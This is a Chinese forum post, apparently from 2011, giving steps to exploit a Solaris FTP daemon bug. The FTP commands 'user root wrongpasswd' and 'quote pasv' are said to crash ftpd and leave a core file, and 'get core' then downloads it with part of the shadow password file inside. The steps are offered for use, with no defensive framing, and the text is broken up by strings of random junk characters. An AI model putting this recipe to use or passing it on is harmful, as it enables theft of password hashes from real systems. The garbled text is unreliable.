该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:4 H4 A2 ~, G$ Q% X
9 }; u e* X3 z8 }7 W C; d1.通过 ftp 正常登录到目的主机上
: F2 V1 ~' Q( t% @0 c z2 p
+ \/ A; x ~, y+ C2.输入如下命令序列:
; x% R4 A* o5 F9 z5 q& y! ?4 J. T0 P$ v" @9 C" I
ftp> user root wrongpasswd
' A c i+ Z, T' H
. f, P$ P- l" h9 Yftp> quote pasv# n" _) L% P& C- T
( {6 ~ j: @, p2 i& Z9 S- f3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。* P2 B3 O! L) |, X1 O) ~ @7 E
/ D4 ~# {( y( D
4.再次进入FTP >get core8 H3 Y7 _7 p5 n, B) _$ j
& M/ P! c8 m" w8 z2 z7 ]1 p, O4 v
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了 W5 }9 p% y- O k k
& w' X+ p/ ]* v8 F3 x# x2 ` |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡